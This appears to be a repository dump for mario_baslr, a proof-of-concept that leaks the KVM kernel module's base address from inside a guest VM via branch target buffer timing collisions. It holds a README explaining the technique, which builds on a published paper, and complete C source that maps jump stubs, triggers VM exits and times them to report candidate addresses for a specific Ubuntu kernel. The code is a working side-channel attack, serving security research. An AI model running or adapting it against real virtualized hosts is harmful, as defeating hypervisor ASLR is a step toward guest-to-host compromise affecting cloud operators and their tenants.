[
  {
    "path": "README.md",
    "content": "# mario_baslr\n\n![alt text](https://github.com/felixwilhelm/mario_baslr/raw/master/baslr.png \"mario_baslr output\")\n\n\nThis repository contains a small Proof-of-Concept tool for leaking the base address of the KVM hypervisor kernel module (kvm.ko) from a guest VM. It does this by using a timing side-channel created by collisions in the branch target buffer (BTB) of modern Intel CPUs.\nThis approach is based on the great research paper [\"Jump Over ASLR: Attacking Branch Predictors to Bypass ASLR\"] (http://www.cs.binghamton.edu/~dima/micro16.pdf) by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh. \n\nInterestingly, the authors of the original paper don't seem to have realised that their technique is not only usable for attacks against KASLR or other user-space tools but also works regardless of virtualization boundaries. This is an important difference to other hardware based timing\nattacks such as `prefetch`, which can only be used for addresses that are mapped in the execution context of the attacker. \n\nIn theory the BTB side-channel offers a generic way to bypass hypervisor/host ASLR in virtualized environments. However, there are a number of important restrictions:\n* As discussed in the linked paper, the BTB only uses bits 0-30 as hash input. This means ASLR implementations that also randomize the most significant bits of virtual addresses can only be weakened.\n* The BTB hashing mechanism does not seem to be very collision safe. This means the PoC tool might not always find a unique  base addresses and return multiple guesses.\n* The attacker needs a way to trigger execution of control-flow instructions in the target using its own CPU core. This is relatively easy for hypervisor code (by triggering a VM exit) but might be more difficult when targeting worker processes or device backends.\n\nOnly the second issue has an impact when targeting the KVM kernel module, making KVM the easiest target for this attack. \n\nThe offsets used in the PoC are targeting kvm.ko compiled for Ubuntu 16.04 with a 4.4.0-38-generic kernel. Future versions might \ninclude a fingerprinting mechanism to make this usable in the real world.\n"
  },
  {
    "path": "mario_baslr.c",
    "content": "/*\nmario_baslr.c\nFelix Wilhelm [fwilhelm@ernw.de]\n\nLeaks kvm.ko base address from a guest VM\nusing time delays created by branch target buffer\ncollisions.\n\nUsage:\n- change function + jump offsets for kvm_cpuid and kvm_emulate_hypercall\nto the correct values for the KVM version of your target.\n(todo: version fingerprinting)\n- compile with gcc -O2 (!)\n- if base address does not show up after a few tries increase MAX_SEARCH_ADDRESS\n  or NUM_RESULTS\n\nSee github.com/felixwilhelm/mario_baslr/ for more info.\n*/\n\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/mman.h>\n\n#define NUM_RESULTS 8\n\n#define MAX_SEARCH_ADDRESS 0xfc09f0000\n\nvoid cpuid(int code) {\n  asm volatile(\"cpuid\" : : \"a\"(code) : \"ebx\", \"ecx\", \"edx\");\n}\n\nuint64_t rdtsc() {\n  uint32_t high, low;\n  asm volatile(\".att_syntax\\n\\t\"\n               \"RDTSCP\\n\\t\"\n               : \"=a\"(low), \"=d\"(high)::);\n  return ((uint64_t)high << 32) | low;\n}\n\nuint64_t time_function(void (*funcptr)()) {\n  uint64_t start;\n  for (int i = 0; i < 50; i++) {\n    funcptr();\n  }\n  asm volatile(\"vmcall\" : : : \"eax\");\n  cpuid(0);\n  start = rdtsc();\n  funcptr();\n  uint64_t end = rdtsc();\n  cpuid(0);\n  return end - start;\n}\n\nvoid jump(void) {\n  asm volatile(\"jmp target\\n\\t\"\n               \"nop\\n\\t\"\n               \"nop\\n\\t\"\n               \"target:nop\\n\\t\"\n               \"nop\\n\\t\");\n}\n\nuint64_t move_and_time(uint64_t addr) {\n  void *mapped = mmap((void *)addr, 2048, PROT_READ | PROT_WRITE | PROT_EXEC,\n                      MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);\n  memcpy((void *)addr, jump, 512);\n  uint64_t res = 0;\n  for (int i = 0; i < 50; i++) {\n    res += time_function((void *)addr);\n  }\n  munmap(mapped, 2048);\n  return res / 50;\n}\n\ntypedef struct _testcase {\n  const char *function_name;\n  uint32_t function_offset;\n  uint16_t jump_offsets[4];\n} testcase;\n\ntypedef struct _result {\n  uint64_t timing;\n  uint64_t address;\n} result;\n\nint cmp(const void *a, const void *b) {\n  uint64_t ta = ((result *)a)->timing;\n  uint64_t tb = ((result *)b)->timing;\n  if (ta < tb)\n    return -1;\n  else if (ta > tb)\n    return 1;\n  return 0;\n}\n\nvoid search_module_base(testcase *t, result *results) {\n  uint64_t low = 0xfc0000000 + t->function_offset;\n  uint64_t high = MAX_SEARCH_ADDRESS;\n\n  memset(results, 0, sizeof(result) * NUM_RESULTS);\n\n  uint64_t sum = 0, count = 0;\n  for (uint64_t c = low; c <= high; c += 0x1000) {\n    sum += move_and_time(c);\n    count++;\n  }\n\n  uint64_t average = sum / count;\n\n  for (uint64_t c = low; c <= high; c += 0x1000) {\n    uint64_t timing = 0;\n    for (int i = 0; i < 4; i++) {\n      timing += move_and_time(c + t->jump_offsets[i]);\n    }\n\n    if (timing > (average * 8)) {\n      printf(\"[!] skipping outlier @ %lx : %ld\\n\", c, timing);\n      continue;\n    }\n\n    if (timing > results[0].timing) {\n      // printf(\"[.] new candidate @ %lx : %ld\\n\", c, timing);\n      results[0].timing = timing;\n      results[0].address = c;\n      qsort(results, NUM_RESULTS, sizeof(result), cmp);\n    }\n  }\n}\n\ntestcase kvm_cpuid = {.function_name = \"kvm_cpuid\",\n                      .function_offset = 0x3ead0,\n                      .jump_offsets = {0, 50, 69, 144}};\n\ntestcase kvm_emulate_hypercall = {\n    .function_name = \"kvm_emulate_hypercall\",\n    .function_offset = 0xf650,\n    .jump_offsets = {0, 47, 56, 66},\n};\n\nint main(int argc, char **argv) {\n  result r[NUM_RESULTS], r2[NUM_RESULTS];\n\n  search_module_base(&kvm_cpuid, r);\n  search_module_base(&kvm_emulate_hypercall, r2);\n\n  int hit = 0;\n\n  for (int i = NUM_RESULTS; i >= 0; i--) {\n    result a = r[i];\n    for (int j = NUM_RESULTS; j >= 0; j--) {\n      result b = r2[j];\n      if (a.address - b.address ==\n          kvm_cpuid.function_offset - kvm_emulate_hypercall.function_offset) {\n        printf(\"[x] potential hit @ %lx : %lx\\n\", a.address, b.address);\n        printf(\"[x] kvm_cpuid @ %lx\\n\", 0xffffffff00000000 | a.address);\n        printf(\"[x] kvm_emulate_hypercall @ %lx\\n\",\n               0xffffffff00000000 | b.address);\n        printf(\"[x] potential kvm.ko base address @ %lx\\n\",\n               0xffffffff00000000 | (a.address - kvm_cpuid.function_offset));\n        hit = 1;\n      }\n    }\n  }\n\n  if (!hit) {\n    printf(\"[!] Did not find a possible match :(\\n[!] If you are sure your \"\n           \"offsets are correct try again.\\n\");\n  }\n}\n"
  }
]